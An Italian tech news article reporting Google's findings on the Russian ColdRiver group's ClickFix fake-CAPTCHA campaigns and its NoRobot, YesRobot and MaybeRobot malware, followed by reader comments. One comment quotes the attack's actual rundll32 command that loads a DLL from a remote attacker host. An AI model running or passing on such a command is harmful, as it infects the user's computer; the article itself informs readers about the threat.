Attacco “ClickFix”: la trappola che ti fa cliccare “Non sono un robot” e infetta il PC
Il collettivo di cyber-spionaggio legato all’FSB russo ha introdotto nuove famiglie di malware in catene di attacco sempre più sofisticate, evolvendosi rapidamente dopo la scoperta del precedente LostKeys
di Andrea Bai pubblicata il 22 Ottobre 2025, alle 09:31 nel canale SicurezzaIl gruppo di hacker russi Star Blizzard e noto anche con i nomi di ColdRiver, UNC4057 e Callisto, ha di recente intensificato la propria attività con l’introduzione di nuove famiglie di malware chiamate NoRobot e MaybeRobot: si tratta di minacce che vengono distribuite attraverso complesse catene di infezione che iniziano con attacchi di ingegneria sociale noti come ClickFix, nei quali le vittime vengono indotte a eseguire codice maligno credendo invece di completare un test CAPTCHA.
Google Threat Intelligence Group (GTIG) ha pubblicato un rapporto che fa luce sulla la campagna: il gruppo ColdRiver ha abbandonato il malware LostKeys meno di una settimana dopo la pubblicazione dell’analisi tecnica da parte dei ricercatori, sostituendolo con una serie di nuovi strumenti ribattezzati NoRobot, YesRobot e MaybeRobot. LostKeys era stato precedentemente impiegato in operazioni di spionaggio ai danni di governi occidentali, giornalisti, think tank e organizzazioni non governative, con capacità di esfiltrazione dei dati basate su un elenco predefinito di estensioni e directory.

Schema di sviluppo del malware - Fonte: GTIG
Dopo la divulgazione pubblica di LostKeys, ColdRiver ha avviato una rapida fase di “retooling”, iniziando da NoRobot, un file DLL malevolo distribuito tramite attacchi ClickFix che utilizzano finte pagine CAPTCHA per convincere la vittima a eseguirlo tramite rundll32, credendo di effettuare una verifica di sicurezza. In realtà, cliccando sul presunto “Non sono un robot”, la vittima attiva l’esecuzione del malware NoRobot.
In un’analisi condotta a settembre, la società di sicurezza cloud Zscaler ha rinominato NoRobot in BaitSwitch e il suo payload in SimpleFix, descrivendo un sistema di infezione in costante evoluzione. Google conferma che NoRobot è stato oggetto di sviluppo continuo dalla primavera fino all’autunno, periodo in cui il malware ha guadagnato persistenza attraverso modifiche al registro di sistema e l’uso di attività pianificate. In alcune varianti, NoRrobot scaricava e installava Python 3.8 per Windows, preparandosi così a caricare il backdoor YesRobot, basato appunto su Python.
Questa soluzione, tuttavia, è stata presto abbandonata: secondo GTIG, l’uso di Python rappresentava un segnale troppo evidente che poteva attirare l’attenzione dei sistemi di sicurezza. ColdRiver ha quindi sostituito YesRobot con un nuovo backdoor basato su PowerShell, denominato MaybeRobot, identificato da Zscaler come una versione aggiornata di SimpleFix.
A partire da giugno, una versione “drasticamente semplificata” di NoRobot è stata utilizzata per distribuire MaybeRobot, capace di eseguire tre tipi di comandi: scaricare ed eseguire payload da URL specifici, avviare comandi tramite prompt di sistema, ed eseguire blocchi arbitrari di PowerShell. Dopo l’esecuzione, MaybeRobot invia i risultati a differenti canali di comando e controllo (C2), fornendo feedback al gruppo sugli esiti delle operazioni.
Secondo gli analisti di Google, lo sviluppo di MaybeRobot sembra essersi stabilizzato, mentre gli sforzi del gruppo si stanno concentrando sull’affinamento di NoRobot, reso progressivamente più stealth e sofisticato. I ricercatori hanno osservato un andamento ciclico nella complessità delle catene d’infezione, passate da architetture articolate a modelli più semplici, per poi tornare a soluzioni complesse che suddividono chiavi crittografiche tra diversi componenti. Solo combinando correttamente i vari segmenti è possibile decifrare il payload finale, una scelta progettuale che secondo il GTIG mira a rendere difficile la ricostruzione dell’intera catena di infezione.
Le operazioni di ColdRiver che distribuiscono NoRobot e i suoi successivi payload sono state osservate tra giugno e settembre e continuano a essere collegate ai servizi d’intelligence russi, in particolare all’FSB. Il gruppo, attivo almeno dal 2017, è noto per la propria attività di spionaggio informatico e rimane operativo nonostante i tentativi di contrasto, tra cui la disattivazione di infrastrutture malevole, azioni legali, e diverse sanzioni internazionali. Le sue campagne si sono finora basate principalmente su attacchi di phishing, ma il passaggio agli attacchi ClickFix rappresenta un cambiamento rilevante nelle tattiche operative.
Gli analisti ipotizzano che ColdRiver miri ora a colpire nuovamente obiettivi già compromessi in passato, sfruttando le nuove famiglie di malware per ottenere ulteriori informazioni dai dispositivi delle vittime, invece che dai loro account di posta elettronica. In questa prospettiva, gli attacchi ClickFix potrebbero servire a raccogliere dati aggiuntivi di valore strategico.
Il rapporto di Google include infine una serie di indicatori di compromissione e regole YARA utili ai professionisti della sicurezza per rilevare e mitigare le attività malevole legate ai malware della famiglia Robot.










FRITZ!Repeater 1700 estende la rete super-veloce Wi-Fi 7
Fondazione Chips-IT, l'Italia alla riscossa nei chip. Il piano e la partnership EssilorLuxottica
Nutanix: innovazione, semplicità e IA al centro della strategia hybrid multicloud
Il futuro dei chip è verticale: RAM e logica impilati per chip più efficienti, ma realizzabili (quasi) ovunque
Accenture e Anthropic insieme per aiutare le imprese a sprigionare il valore dell'IA
Fino a 360 GB su un vetro grande come una moneta: l'archiviazione del futuro presto alla prova dei fatti
tado° porta il bilanciamento idraulico automatico nelle case: più efficienza nel riscaldamento senza interventi tecnici
Metallo liquido o solido? Entrambi, contemporaneamente: lo stato ibrido che sfida la fisica
iPhone 17 Pro Max in offerta su Amazon: la versione da 256 GB scende a 1.349€
A Taranto divieto di bici, e-bike e monopattini in zone pedonali. Richiesta una revisione
Scopa elettrica lava e aspira come una top di gamma: DREAME H12 Pro FlexReach scende a 229€ su Amazon
SumUp continua a crescere ed espande l'offerta
Volkswagen ID.Polo: da 25.000 euro, in quattro versioni con due batterie
iPhone Fold: le ultime indiscrezioni suggeriscono l'assenza del Face ID
Audi Revolut F1 Team: annunciati nome e logo della nuova squadra del circus
Resident Evil - Code Veronica Remake: l'annuncio è atteso per il prossimo anno con uscita nel 2027
Occhio ai prezzi dei robot ECOVACS Deebot: su Amazon si torna ai livelli del Black Friday da 199€









4 Commenti
Gli autori dei commenti, e non la redazione, sono responsabili dei contenuti da loro inseriti - infoSì vabbe', ma...
..."When the user clicks the checkbox, the embedded JavaScript code copies a malicious command (rundll32.exe \\captchanom.top\check\machinerie.dll,verifyme) to the user’s clipboard. Next, the page displays UI elements designed to prompt the user to paste and execute this command in the Windows Run dialog box"Qua mi sembra siamo un po' oltre l'utente che apre un allegato di posta malevolo.
Qua mi sembra siamo un po' oltre l'utente che apre un allegato di posta malevolo.
Qua mi sembra siamo un po' oltre l'utente che apre un allegato di posta malevolo.
Come sempre, PEBKAC
At this point, the user receives a phone call from the attacker saying, "open the door, your pizza is getting cold." Next, the user opens the door and lets the attacker enter the house...
__________________
Non mi spaventa la stupidità.
Quello che mi spaventa è quando la stupidità prende possesso di persone che hanno facoltà di muoversi o parlare.
in effetti devi essere un po' rincoglionito per incollare i comandi che ti dicono i popup nella fiunestra esegui
Devi effettuare il login per poter commentare
Se non sei ancora registrato, puoi farlo attraverso questo form.
Se sei già registrato e loggato nel sito, puoi inserire il tuo commento.
Si tenga presente quanto letto nel regolamento, nel rispetto del "quieto vivere".